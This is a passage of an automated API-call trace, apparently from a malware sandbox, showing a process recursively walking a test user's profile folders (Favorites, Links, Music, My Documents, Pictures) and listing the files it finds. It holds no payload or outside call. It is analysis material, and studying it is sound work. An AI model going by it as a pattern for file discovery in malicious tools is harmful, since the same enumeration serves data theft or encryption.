(lpString="desktop.ini") returned 11 [0070.684] FindClose (in: hFindFile=0x4d7af8 | out: hFindFile=0x4d7af8) returned 1 [0070.684] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ed100 | out: hHeap=0x4a0000) returned 1 [0070.684] FindNextFileW (in: hFindFile=0x4d7ab8, lpFindFileData=0x4d9400 | out: lpFindFileData=0x4d9400*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x5136316d, cFileName="Microsoft Websites", cAlternateFileName="MICROS~1")) returned 1 [0070.684] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.684] lstrlenW (lpString="Microsoft Websites") returned 18 [0070.684] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\*", lpFindFileData=0x4ed100 | out: lpFindFileData=0x4ed100*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d7af8 [0070.738] FindNextFileW (in: hFindFile=0x4d7af8, lpFindFileData=0x4ed100 | out: lpFindFileData=0x4ed100*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0070.738] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.738] FindNextFileW (in: hFindFile=0x4d7af8, lpFindFileData=0x4ed100 | out: lpFindFileData=0x4ed100*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="IE Add-on site.url", cAlternateFileName="IEADD-~1.URL")) returned 1 [0070.738] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.738] lstrlenW (lpString="IE Add-on site.url") returned 18 [0070.739] FindClose (in: hFindFile=0x4d7af8 | out: hFindFile=0x4d7af8) returned 1 [0070.739] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ed100 | out: hHeap=0x4a0000) returned 1 [0070.739] FindNextFileW (in: hFindFile=0x4d7ab8, lpFindFileData=0x4d9400 | out: lpFindFileData=0x4d9400*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x5136316d, cFileName="MSN Websites", cAlternateFileName="MSNWEB~1")) returned 1 [0070.739] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.739] lstrlenW (lpString="MSN Websites") returned 12 [0070.739] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\*", lpFindFileData=0x4e09f0 | out: lpFindFileData=0x4e09f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xce6db294, dwReserved1=0x97b9213, cFileName=".", cAlternateFileName="")) returned 0x4d7af8 [0070.758] FindNextFileW (in: hFindFile=0x4d7af8, lpFindFileData=0x4e09f0 | out: lpFindFileData=0x4e09f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xce6db294, dwReserved1=0x97b9213, cFileName="..", cAlternateFileName="")) returned 1 [0070.758] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.758] FindNextFileW (in: hFindFile=0x4d7af8, lpFindFileData=0x4e09f0 | out: lpFindFileData=0x4e09f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xce6db294, dwReserved1=0x97b9213, cFileName="MSN Autos.url", cAlternateFileName="MSNAUT~1.URL")) returned 1 [0070.758] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.758] lstrlenW (lpString="MSN Autos.url") returned 13 [0070.759] FindClose (in: hFindFile=0x4d7af8 | out: hFindFile=0x4d7af8) returned 1 [0070.759] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e09f0 | out: hHeap=0x4a0000) returned 1 [0070.759] FindNextFileW (in: hFindFile=0x4d7ab8, lpFindFileData=0x4d9400 | out: lpFindFileData=0x4d9400*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x5136316d, cFileName="Windows Live", cAlternateFileName="WINDOW~1")) returned 1 [0070.759] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.759] lstrlenW (lpString="Windows Live") returned 12 [0070.759] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\*", lpFindFileData=0x4e09f0 | out: lpFindFileData=0x4e09f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xce6db294, dwReserved1=0x97b9213, cFileName=".", cAlternateFileName="")) returned 0x4d7af8 [0070.805] FindNextFileW (in: hFindFile=0x4d7af8, lpFindFileData=0x4e09f0 | out: lpFindFileData=0x4e09f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xce6db294, dwReserved1=0x97b9213, cFileName="..", cAlternateFileName="")) returned 1 [0070.805] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.805] FindNextFileW (in: hFindFile=0x4d7af8, lpFindFileData=0x4e09f0 | out: lpFindFileData=0x4e09f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xce6db294, dwReserved1=0x97b9213, cFileName="Get Windows Live.url", cAlternateFileName="GETWIN~1.URL")) returned 1 [0070.805] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.805] lstrlenW (lpString="Get Windows Live.url") returned 20 [0070.805] FindClose (in: hFindFile=0x4d7af8 | out: hFindFile=0x4d7af8) returned 1 [0070.806] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e09f0 | out: hHeap=0x4a0000) returned 1 [0070.806] FindNextFileW (in: hFindFile=0x4d7ab8, lpFindFileData=0x4d9400 | out: lpFindFileData=0x4d9400*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x5136316d, cFileName="Windows Live", cAlternateFileName="WINDOW~1")) returned 0 [0070.806] FindClose (in: hFindFile=0x4d7ab8 | out: hFindFile=0x4d7ab8) returned 1 [0070.806] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d9400 | out: hHeap=0x4a0000) returned 1 [0070.806] FindNextFileW (in: hFindFile=0x4e1698, lpFindFileData=0x4d91a8 | out: lpFindFileData=0x4d91a8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x730055, cFileName="Links", cAlternateFileName="")) returned 1 [0070.806] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.806] lstrlenW (lpString="Links") returned 5 [0070.806] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\*", lpFindFileData=0x4d9400 | out: lpFindFileData=0x4d9400*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x5136316d, cFileName=".", cAlternateFileName="")) returned 0x4d7ab8 [0070.806] FindNextFileW (in: hFindFile=0x4d7ab8, lpFindFileData=0x4d9400 | out: lpFindFileData=0x4d9400*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x5136316d, cFileName="..", cAlternateFileName="")) returned 1 [0070.806] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.806] FindNextFileW (in: hFindFile=0x4d7ab8, lpFindFileData=0x4d9400 | out: lpFindFileData=0x4d9400*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x244, dwReserved0=0xa0000003, dwReserved1=0x5136316d, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0070.806] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.807] lstrlenW (lpString="desktop.ini") returned 11 [0070.807] FindClose (in: hFindFile=0x4d7ab8 | out: hFindFile=0x4d7ab8) returned 1 [0070.807] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d9400 | out: hHeap=0x4a0000) returned 1 [0070.807] FindNextFileW (in: hFindFile=0x4e1698, lpFindFileData=0x4d91a8 | out: lpFindFileData=0x4d91a8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x2914fe20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x730055, cFileName="Local Settings", cAlternateFileName="LOCALS~1")) returned 1 [0070.807] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.807] lstrlenW (lpString="Local Settings") returned 14 [0070.807] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\*", lpFindFileData=0x4d9400 | out: lpFindFileData=0x4d9400*(dwFileAttributes=0x4e09f0, ftCreationTime.dwLowDateTime=0x4ed440, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0x5136316d, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 0xffffffff [0070.807] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d9400 | out: hHeap=0x4a0000) returned 1 [0070.807] FindNextFileW (in: hFindFile=0x4e1698, lpFindFileData=0x4d91a8 | out: lpFindFileData=0x4d91a8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd8f2a220, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xd8f2a220, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x730055, cFileName="Music", cAlternateFileName="")) returned 1 [0070.807] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.807] lstrlenW (lpString="Music") returned 5 [0070.807] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*", lpFindFileData=0x4d9400 | out: lpFindFileData=0x4d9400*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd8f2a220, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xd8f2a220, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x5136316d, cFileName=".", cAlternateFileName="")) returned 0x4d7ab8 [0070.807] FindNextFileW (in: hFindFile=0x4d7ab8, lpFindFileData=0x4d9400 | out: lpFindFileData=0x4d9400*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd8f2a220, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xd8f2a220, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x5136316d, cFileName="..", cAlternateFileName="")) returned 1 [0070.807] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.807] FindNextFileW (in: hFindFile=0x4d7ab8, lpFindFileData=0x4d9400 | out: lpFindFileData=0x4d9400*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x390ca730, ftCreationTime.dwHighDateTime=0x1d5e5cb, ftLastAccessTime.dwLowDateTime=0x6b188ae0, ftLastAccessTime.dwHighDateTime=0x1d5e41e, ftLastWriteTime.dwLowDateTime=0x6b188ae0, ftLastWriteTime.dwHighDateTime=0x1d5e41e, nFileSizeHigh=0x0, nFileSizeLow=0x6560, dwReserved0=0xa0000003, dwReserved1=0x5136316d, cFileName="-GMRqLqTl2xTjUrVz-9.wav", cAlternateFileName="-GMRQL~1.WAV")) returned 1 [0070.808] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.808] lstrlenW (lpString="-GMRqLqTl2xTjUrVz-9.wav") returned 23 [0070.808] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\B7uOo2nNfIrn\\*", lpFindFileData=0x4ed048 | out: lpFindFileData=0x4ed048*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd3799620, ftCreationTime.dwHighDateTime=0x1d5ddce, ftLastAccessTime.dwLowDateTime=0x76be22d0, ftLastAccessTime.dwHighDateTime=0x1d5e7a5, ftLastWriteTime.dwLowDateTime=0x76be22d0, ftLastWriteTime.dwHighDateTime=0x1d5e7a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x20006c, dwReserved1=0x730055, cFileName=".", cAlternateFileName="")) returned 0x4d7af8 [0070.808] FindNextFileW (in: hFindFile=0x4d7af8, lpFindFileData=0x4ed048 | out: lpFindFileData=0x4ed048*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd3799620, ftCreationTime.dwHighDateTime=0x1d5ddce, ftLastAccessTime.dwLowDateTime=0x76be22d0, ftLastAccessTime.dwHighDateTime=0x1d5e7a5, ftLastWriteTime.dwLowDateTime=0x76be22d0, ftLastWriteTime.dwHighDateTime=0x1d5e7a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x20006c, dwReserved1=0x730055, cFileName="..", cAlternateFileName="")) returned 1 [0070.808] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.808] FindNextFileW (in: hFindFile=0x4d7af8, lpFindFileData=0x4ed048 | out: lpFindFileData=0x4ed048*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98f34bd0, ftCreationTime.dwHighDateTime=0x1d5e702, ftLastAccessTime.dwLowDateTime=0xcf191ea0, ftLastAccessTime.dwHighDateTime=0x1d5d89e, ftLastWriteTime.dwLowDateTime=0xcf191ea0, ftLastWriteTime.dwHighDateTime=0x1d5d89e, nFileSizeHigh=0x0, nFileSizeLow=0x10533, dwReserved0=0x20006c, dwReserved1=0x730055, cFileName="7VesVgj4dpoklOXOd7.mp3", cAlternateFileName="7VESVG~1.MP3")) returned 1 [0070.808] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.808] lstrlenW (lpString="7VesVgj4dpoklOXOd7.mp3") returned 22 [0070.808] FindClose (in: hFindFile=0x4d7af8 | out: hFindFile=0x4d7af8) returned 1 [0070.808] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ed048 | out: hHeap=0x4a0000) returned 1 [0070.808] FindNextFileW (in: hFindFile=0x4d7ab8, lpFindFileData=0x4d9400 | out: lpFindFileData=0x4d9400*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x5136316d, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0070.808] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.809] lstrlenW (lpString="desktop.ini") returned 11 [0070.809] FindClose (in: hFindFile=0x4d7ab8 | out: hFindFile=0x4d7ab8) returned 1 [0070.809] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d9400 | out: hHeap=0x4a0000) returned 1 [0070.809] FindNextFileW (in: hFindFile=0x4e1698, lpFindFileData=0x4d91a8 | out: lpFindFileData=0x4d91a8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x730055, cFileName="My Documents", cAlternateFileName="MYDOCU~1")) returned 1 [0070.809] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.809] lstrlenW (lpString="My Documents") returned 12 [0070.809] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\*", lpFindFileData=0x4d9400 | out: lpFindFileData=0x4d9400*(dwFileAttributes=0x4ed048, ftCreationTime.dwLowDateTime=0x4e1368, ftCreationTime.dwHighDateTime=0x1d5e331, ftLastAccessTime.dwLowDateTime=0x311cfb40, ftLastAccessTime.dwHighDateTime=0x1d5dd76, ftLastWriteTime.dwLowDateTime=0x311cfb40, ftLastWriteTime.dwHighDateTime=0x1d5dd76, nFileSizeHigh=0x0, nFileSizeLow=0x11c89, dwReserved0=0xa0000003, dwReserved1=0x5136316d, cFileName="_2J8OUI4UfGSeBV.m4a", cAlternateFileName="_2J8OU~1.M4A")) returned 0xffffffff [0070.809] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d9400 | out: hHeap=0x4a0000) returned 1 [0070.809] FindNextFileW (in: hFindFile=0x4e1698, lpFindFileData=0x4d91a8 | out: lpFindFileData=0x4d91a8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x730055, cFileName="NetHood", cAlternateFileName="")) returned 1 [0070.809] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.809] lstrlenW (lpString="NetHood") returned 7 [0070.809] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\*", lpFindFileData=0x4d9400 | out: lpFindFileData=0x4d9400*(dwFileAttributes=0x4ed048, ftCreationTime.dwLowDateTime=0x4e1368, ftCreationTime.dwHighDateTime=0x1d5e331, ftLastAccessTime.dwLowDateTime=0x311cfb40, ftLastAccessTime.dwHighDateTime=0x1d5dd76, ftLastWriteTime.dwLowDateTime=0x311cfb40, ftLastWriteTime.dwHighDateTime=0x1d5dd76, nFileSizeHigh=0x0, nFileSizeLow=0x11c89, dwReserved0=0xa0000003, dwReserved1=0x5136316d, cFileName="_2J8OUI4UfGSeBV.m4a", cAlternateFileName="_2J8OU~1.M4A")) returned 0xffffffff [0070.809] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d9400 | out: hHeap=0x4a0000) returned 1 [0070.809] FindNextFileW (in: hFindFile=0x4e1698, lpFindFileData=0x4d91a8 | out: lpFindFileData=0x4d91a8*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x8f3afd80, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0x8f3afd80, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x100000, dwReserved0=0xa0000003, dwReserved1=0x730055, cFileName="NTUSER.DAT", cAlternateFileName="")) returned 1 [0070.809] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.810] lstrlenW (lpString="NTUSER.DAT") returned 10 [0070.810] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*", lpFindFileData=0x4ef770 | out: lpFindFileData=0x4ef770*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd9080e80, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xd9080e80, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d5e82a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d7ab8 [0070.810] FindNextFileW (in: hFindFile=0x4d7ab8, lpFindFileData=0x4ef770 | out: lpFindFileData=0x4ef770*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd9080e80, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xd9080e80, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d5e82a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0070.810] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.810] FindNextFileW (in: hFindFile=0x4d7ab8, lpFindFileData=0x4ef770 | out: lpFindFileData=0x4ef770*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x1d5e82a, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0070.810] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.810] lstrlenW (lpString="desktop.ini") returned 11 [0070.811] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\*", lpFindFileData=0x4ef9c8 | out: lpFindFileData=0x4ef9c8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x787d4020, ftCreationTime.dwHighDateTime=0x1d5e01f, ftLastAccessTime.dwLowDateTime=0x53da78a0, ftLastAccessTime.dwHighDateTime=0x1d5e64b, ftLastWriteTime.dwLowDateTime=0x53da78a0, ftLastWriteTime.dwHighDateTime=0x1d5e64b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x200065, dwReserved1=0x88, 